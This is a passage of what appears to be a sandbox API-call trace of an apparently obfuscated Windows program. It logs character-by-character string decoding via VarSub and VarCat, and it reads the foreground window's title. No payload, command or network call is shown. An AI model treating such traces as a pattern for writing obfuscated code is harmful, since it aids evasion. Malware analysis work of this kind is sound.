cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.234] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.234] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.235] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.235] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.236] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.236] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.236] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.237] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.237] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.238] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.238] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.238] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.239] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.239] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.240] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.240] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.291] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.291] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.292] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.292] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.292] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.293] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.293] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.294] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.294] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.294] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.295] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.295] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.295] GetForegroundWindow () returned 0x1011a [0181.296] GetLastError () returned 0x0 [0181.296] SysStringLen (param_1=" ") returned 0xff [0181.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.296] SysStringLen (param_1=" ") returned 0xff [0181.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.296] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0181.296] GetLastError () returned 0x0 [0181.297] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.297] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0181.297] SysStringLen (param_1="Folde") returned 0x5 [0181.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Folde", cchWideChar=6, lpMultiByteStr=0x116854c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Folde", lpUsedDefaultChar=0x0) returned 6 [0181.298] SetWindowTextA (hWnd=0x103c4, lpString="Folde") returned 1 [0181.298] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0181.298] GetFocus () returned 0x0 [0181.298] lstrlenA (lpString="Folde") returned 5 [0181.298] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0181.298] IsWindow (hWnd=0x103c4) returned 1 [0181.299] IsWindow (hWnd=0x103c4) returned 1 [0181.299] IsWindow (hWnd=0x103c4) returned 1 [0181.299] IsWindow (hWnd=0x103c4) returned 1 [0181.299] GetFocus () returned 0x0 [0181.300] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0181.300] GetFocus () returned 0x0 [0181.300] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0181.300] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0181.300] GetFocus () returned 0x0 [0181.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Folde", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0181.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Folde", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=6 | out: lpWideCharStr="Folde") returned 6 [0181.300] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.301] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0181.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.302] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0181.302] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.303] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0181.303] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.305] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0181.305] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.306] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.307] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.307] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.308] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.308] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.308] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.309] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.309] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.310] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.310] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.311] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.311] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.311] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.312] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.312] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.313] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.313] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.314] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.314] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.315] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.315] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.316] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.316] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.317] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.318] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.319] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.320] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.320] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.321] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.322] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, 